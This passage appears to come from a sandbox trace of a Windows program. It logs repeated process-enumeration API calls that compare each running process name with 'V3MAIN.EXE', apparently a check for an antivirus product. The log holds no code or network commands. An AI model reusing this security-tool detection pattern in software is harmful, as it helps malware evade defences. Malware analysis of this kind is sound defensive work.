returned 0xb [0163.313] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.313] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.314] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.314] lstrlenW (lpString="svchost.exe") returned 11 [0163.314] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.314] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.314] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0163.315] lstrcpyW (in: lpString1=0x18f6dc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0163.315] lstrlenW (lpString="spoolsv.exe") returned 11 [0163.315] CharUpperBuffW (in: lpsz="spoolsv.exe", cchLength=0xb | out: lpsz="SPOOLSV.EXE") returned 0xb [0163.315] lstrcmpW (lpString1="SPOOLSV.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.315] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.315] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.315] lstrlenW (lpString="svchost.exe") returned 11 [0163.315] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.315] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.315] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.316] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.316] lstrlenW (lpString="taskhost.exe") returned 12 [0163.316] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.316] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.316] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, 
th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.317] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.317] lstrlenW (lpString="taskeng.exe") returned 11 [0163.317] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.317] lstrcmpW (lpString1="TASKENG.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.317] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0163.317] lstrcpyW (in: lpString1=0x18f6dc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0163.317] lstrlenW (lpString="dwm.exe") returned 7 [0163.318] CharUpperBuffW (in: lpsz="dwm.exe", cchLength=0x7 | out: lpsz="DWM.EXE") returned 0x7 [0163.318] lstrcmpW (lpString1="DWM.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.318] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x658, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.318] lstrcpyW (in: lpString1=0x18f6dc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0163.318] lstrlenW (lpString="explorer.exe") returned 12 [0163.318] CharUpperBuffW (in: lpsz="explorer.exe", cchLength=0xc | out: lpsz="EXPLORER.EXE") returned 0xc [0163.318] lstrcmpW (lpString1="EXPLORER.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.318] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="taskeng.exe")) returned 1 [0163.319] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.319] lstrlenW (lpString="taskeng.exe") returned 11 [0163.319] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.319] lstrcmpW (lpString1="TASKENG.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.319] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="MSOSYNC.EXE")) returned 1 [0163.320] lstrcpyW (in: lpString1=0x18f6dc, lpString2="MSOSYNC.EXE" | out: lpString1="MSOSYNC.EXE") returned="MSOSYNC.EXE" [0163.320] lstrlenW (lpString="MSOSYNC.EXE") returned 11 [0163.320] CharUpperBuffW (in: lpsz="MSOSYNC.EXE", cchLength=0xb | out: lpsz="MSOSYNC.EXE") returned 0xb [0163.320] lstrcmpW (lpString1="MSOSYNC.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.320] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.320] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.320] lstrlenW (lpString="taskhost.exe") returned 12 [0163.320] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.320] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.320] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="calls ccd 
copyright.exe")) returned 1 [0163.321] lstrcpyW (in: lpString1=0x18f6dc, lpString2="calls ccd copyright.exe" | out: lpString1="calls ccd copyright.exe") returned="calls ccd copyright.exe" [0163.321] lstrlenW (lpString="calls ccd copyright.exe") returned 23 [0163.321] CharUpperBuffW (in: lpsz="calls ccd copyright.exe", cchLength=0x17 | out: lpsz="CALLS CCD COPYRIGHT.EXE") returned 0x17 [0163.321] lstrcmpW (lpString1="CALLS CCD COPYRIGHT.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.321] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="tri.exe")) returned 1 [0163.322] lstrcpyW (in: lpString1=0x18f6dc, lpString2="tri.exe" | out: lpString1="tri.exe") returned="tri.exe" [0163.322] lstrlenW (lpString="tri.exe") returned 7 [0163.322] CharUpperBuffW (in: lpsz="tri.exe", cchLength=0x7 | out: lpsz="TRI.EXE") returned 0x7 [0163.322] lstrcmpW (lpString1="TRI.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.322] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x73c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="navigation-jay.exe")) returned 1 [0163.322] lstrcpyW (in: lpString1=0x18f6dc, lpString2="navigation-jay.exe" | out: lpString1="navigation-jay.exe") returned="navigation-jay.exe" [0163.322] lstrlenW (lpString="navigation-jay.exe") returned 18 [0163.322] CharUpperBuffW (in: lpsz="navigation-jay.exe", cchLength=0x12 | out: lpsz="NAVIGATION-JAY.EXE") returned 0x12 [0163.322] lstrcmpW (lpString1="NAVIGATION-JAY.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.322] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, 
th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="chevrolet-play-mel.exe")) returned 1 [0163.323] lstrcpyW (in: lpString1=0x18f6dc, lpString2="chevrolet-play-mel.exe" | out: lpString1="chevrolet-play-mel.exe") returned="chevrolet-play-mel.exe" [0163.323] lstrlenW (lpString="chevrolet-play-mel.exe") returned 22 [0163.323] CharUpperBuffW (in: lpsz="chevrolet-play-mel.exe", cchLength=0x16 | out: lpsz="CHEVROLET-PLAY-MEL.EXE") returned 0x16 [0163.323] lstrcmpW (lpString1="CHEVROLET-PLAY-MEL.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.323] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="clause_swaziland_complimentary.exe")) returned 1 [0163.323] lstrcpyW (in: lpString1=0x18f6dc, lpString2="clause_swaziland_complimentary.exe" | out: lpString1="clause_swaziland_complimentary.exe") returned="clause_swaziland_complimentary.exe" [0163.323] lstrlenW (lpString="clause_swaziland_complimentary.exe") returned 34 [0163.323] CharUpperBuffW (in: lpsz="clause_swaziland_complimentary.exe", cchLength=0x22 | out: lpsz="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE") returned 0x22 [0163.323] lstrcmpW (lpString1="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.323] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="ship-loans.exe")) returned 1 [0163.324] lstrcpyW (in: lpString1=0x18f6dc, lpString2="ship-loans.exe" | out: lpString1="ship-loans.exe") returned="ship-loans.exe" [0163.324] lstrlenW (lpString="ship-loans.exe") returned 14 [0163.324] CharUpperBuffW (in: lpsz="ship-loans.exe", cchLength=0xe | out: lpsz="SHIP-LOANS.EXE") returned 0xe [0163.324] 
lstrcmpW (lpString1="SHIP-LOANS.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.324] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="isolation.exe")) returned 1 [0163.324] lstrcpyW (in: lpString1=0x18f6dc, lpString2="isolation.exe" | out: lpString1="isolation.exe") returned="isolation.exe" [0163.324] lstrlenW (lpString="isolation.exe") returned 13 [0163.325] CharUpperBuffW (in: lpsz="isolation.exe", cchLength=0xd | out: lpsz="ISOLATION.EXE") returned 0xd [0163.325] lstrcmpW (lpString1="ISOLATION.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.325] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="abc.exe")) returned 1 [0163.325] lstrcpyW (in: lpString1=0x18f6dc, lpString2="abc.exe" | out: lpString1="abc.exe") returned="abc.exe" [0163.325] lstrlenW (lpString="abc.exe") returned 7 [0163.325] CharUpperBuffW (in: lpsz="abc.exe", cchLength=0x7 | out: lpsz="ABC.EXE") returned 0x7 [0163.325] lstrcmpW (lpString1="ABC.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.325] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="previous_automation_previously.exe")) returned 1 [0163.326] lstrcpyW (in: lpString1=0x18f6dc, lpString2="previous_automation_previously.exe" | out: lpString1="previous_automation_previously.exe") returned="previous_automation_previously.exe" [0163.326] lstrlenW (lpString="previous_automation_previously.exe") returned 34 [0163.326] CharUpperBuffW (in: 
lpsz="previous_automation_previously.exe", cchLength=0x22 | out: lpsz="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE") returned 0x22 [0163.326] lstrcmpW (lpString1="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.326] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="english_performing.exe")) returned 1 [0163.327] lstrcpyW (in: lpString1=0x18f6dc, lpString2="english_performing.exe" | out: lpString1="english_performing.exe") returned="english_performing.exe" [0163.327] lstrlenW (lpString="english_performing.exe") returned 22 [0163.327] CharUpperBuffW (in: lpsz="english_performing.exe", cchLength=0x16 | out: lpsz="ENGLISH_PERFORMING.EXE") returned 0x16 [0163.327] lstrcmpW (lpString1="ENGLISH_PERFORMING.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.327] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="laptop-tattoo.exe")) returned 1 [0163.327] lstrcpyW (in: lpString1=0x18f6dc, lpString2="laptop-tattoo.exe" | out: lpString1="laptop-tattoo.exe") returned="laptop-tattoo.exe" [0163.327] lstrlenW (lpString="laptop-tattoo.exe") returned 17 [0163.327] CharUpperBuffW (in: lpsz="laptop-tattoo.exe", cchLength=0x11 | out: lpsz="LAPTOP-TATTOO.EXE") returned 0x11 [0163.327] lstrcmpW (lpString1="LAPTOP-TATTOO.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.327] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="c-weird-baskets.exe")) returned 1 [0163.345] lstrcpyW (in: 
lpString1=0x18f6dc, lpString2="c-weird-baskets.exe" | out: lpString1="c-weird-baskets.exe") returned="c-weird-baskets.exe" [0163.345] lstrlenW (lpString="c-weird-baskets.exe") returned 19 [0163.345] CharUpperBuffW (in: lpsz="c-weird-baskets.exe", cchLength=0x13 | out: lpsz="C-WEIRD-BASKETS.EXE") returned 0x13 [0163.345] lstrcmpW (lpString1="C-WEIRD-BASKETS.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.345] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="volume.exe")) returned 1 [0163.346] lstrcpyW (in: lpString1=0x18f6dc, lpString2="volume.exe" | out: lpString1="volume.exe") returned="volume.exe" [0163.346] lstrlenW (lpString="volume.exe") returned 10 [0163.346] CharUpperBuffW (in: lpsz="volume.exe", cchLength=0xa | out: lpsz="VOLUME.EXE") returned 0xa [0163.346] lstrcmpW (lpString1="VOLUME.EXE", lpString2="V3MAIN.EXE") returned 1 [0163.346] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="rich-zealand.exe")) returned 1 [0163.346] lstrcpyW (in: lpString1=0x18f6dc, lpString2="rich-zealand.exe" | out: lpString1="rich-zealand.exe") returned="rich-zealand.exe" [0163.347] lstrlenW (lpString="rich-zealand.exe") returned 16 [0163.347] CharUpperBuffW (in: lpsz="rich-zealand.exe", cchLength=0x10 | out: lpsz="RICH-ZEALAND.EXE") returned 0x10 [0163.347] lstrcmpW (lpString1="RICH-ZEALAND.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.347] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="objectives-bailey-audit.exe")) returned 1 [0163.347] lstrcpyW (in: lpString1=0x18f6dc, lpString2="objectives-bailey-audit.exe" | out: lpString1="objectives-bailey-audit.exe") returned="objectives-bailey-audit.exe" [0163.347] lstrlenW (lpString="objectives-bailey-audit.exe") returned 27 [0163.347] CharUpperBuffW (in: lpsz="objectives-bailey-audit.exe", cchLength=0x1b | out: lpsz="OBJECTIVES-BAILEY-AUDIT.EXE") returned 0x1b [0163.347] lstrcmpW (lpString1="OBJECTIVES-BAILEY-AUDIT.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.347] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="puzzle-fcc-tuesday.exe")) returned 1 [0163.348] lstrcpyW (in: lpString1=0x18f6dc, lpString2="puzzle-fcc-tuesday.exe" | out: lpString1="puzzle-fcc-tuesday.exe") returned="puzzle-fcc-tuesday.exe" [0163.348] lstrlenW (lpString="puzzle-fcc-tuesday.exe") returned 22 [0163.348] CharUpperBuffW (in: lpsz="puzzle-fcc-tuesday.exe", cchLength=0x16 | out: lpsz="PUZZLE-FCC-TUESDAY.EXE") returned 0x16 [0163.348] lstrcmpW (lpString1="PUZZLE-FCC-TUESDAY.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.348] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="sayconvenience.exe")) returned 1 [0163.351] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sayconvenience.exe" | out: lpString1="sayconvenience.exe") returned="sayconvenience.exe" [0163.351] lstrlenW (lpString="sayconvenience.exe") returned 18 [0163.351] CharUpperBuffW (in: lpsz="sayconvenience.exe", cchLength=0x12 | out: lpsz="SAYCONVENIENCE.EXE") returned 0x12 [0163.351] lstrcmpW (lpString1="SAYCONVENIENCE.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.351] 
Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="psychology-leaving-examinations.exe")) returned 1 [0163.352] lstrcpyW (in: lpString1=0x18f6dc, lpString2="psychology-leaving-examinations.exe" | out: lpString1="psychology-leaving-examinations.exe") returned="psychology-leaving-examinations.exe" [0163.352] lstrlenW (lpString="psychology-leaving-examinations.exe") returned 35 [0163.352] CharUpperBuffW (in: lpsz="psychology-leaving-examinations.exe", cchLength=0x23 | out: lpsz="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE") returned 0x23 [0163.352] lstrcmpW (lpString1="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.352] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="EXCEL.EXE")) returned 1 [0163.352] lstrcpyW (in: lpString1=0x18f6dc, lpString2="EXCEL.EXE" | out: lpString1="EXCEL.EXE") returned="EXCEL.EXE" [0163.352] lstrlenW (lpString="EXCEL.EXE") returned 9 [0163.352] CharUpperBuffW (in: lpsz="EXCEL.EXE", cchLength=0x9 | out: lpsz="EXCEL.EXE") returned 0x9 [0163.352] lstrcmpW (lpString1="EXCEL.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.352] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.353] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.353] lstrlenW (lpString="svchost.exe") returned 11 [0163.353] CharUpperBuffW (in: lpsz="svchost.exe", 
cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.353] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.353] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0163.353] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0163.353] lstrlenW (lpString="sppsvc.exe") returned 10 [0163.353] CharUpperBuffW (in: lpsz="sppsvc.exe", cchLength=0xa | out: lpsz="SPPSVC.EXE") returned 0xa [0163.353] lstrcmpW (lpString1="SPPSVC.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.353] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0163.354] lstrcpyW (in: lpString1=0x18f6dc, lpString2="OSPPSVC.EXE" | out: lpString1="OSPPSVC.EXE") returned="OSPPSVC.EXE" [0163.354] lstrlenW (lpString="OSPPSVC.EXE") returned 11 [0163.354] CharUpperBuffW (in: lpsz="OSPPSVC.EXE", cchLength=0xb | out: lpsz="OSPPSVC.EXE") returned 0xb [0163.354] lstrcmpW (lpString1="OSPPSVC.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.354] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.354] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.354] lstrlenW (lpString="svchost.exe") returned 11 [0163.354] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 
0xb [0163.354] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.354] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.355] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.355] lstrlenW (lpString="svchost.exe") returned 11 [0163.355] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.355] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3MAIN.EXE") returned -1 [0163.355] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x890, pcPriClassBase=8, dwFlags=0x0, szExeFile="winpoint.exe")) returned 1 [0163.355] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winpoint.exe" | out: lpString1="winpoint.exe") returned="winpoint.exe" [0163.355] lstrlenW (lpString="winpoint.exe") returned 12 [0163.355] CharUpperBuffW (in: lpsz="winpoint.exe", cchLength=0xc | out: lpsz="WINPOINT.EXE") returned 0xc [0163.355] lstrcmpW (lpString1="WINPOINT.EXE", lpString2="V3MAIN.EXE") returned 1 [0163.356] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0163.356] lstrcpyW (in: lpString1=0x18f6dc, lpString2="cmd.exe" | out: lpString1="cmd.exe") returned="cmd.exe" [0163.356] lstrlenW (lpString="cmd.exe") returned 7 [0163.356] CharUpperBuffW (in: lpsz="cmd.exe", cchLength=0x7 | out: lpsz="CMD.EXE") returned 0x7 [0163.356] lstrcmpW (lpString1="CMD.EXE", 
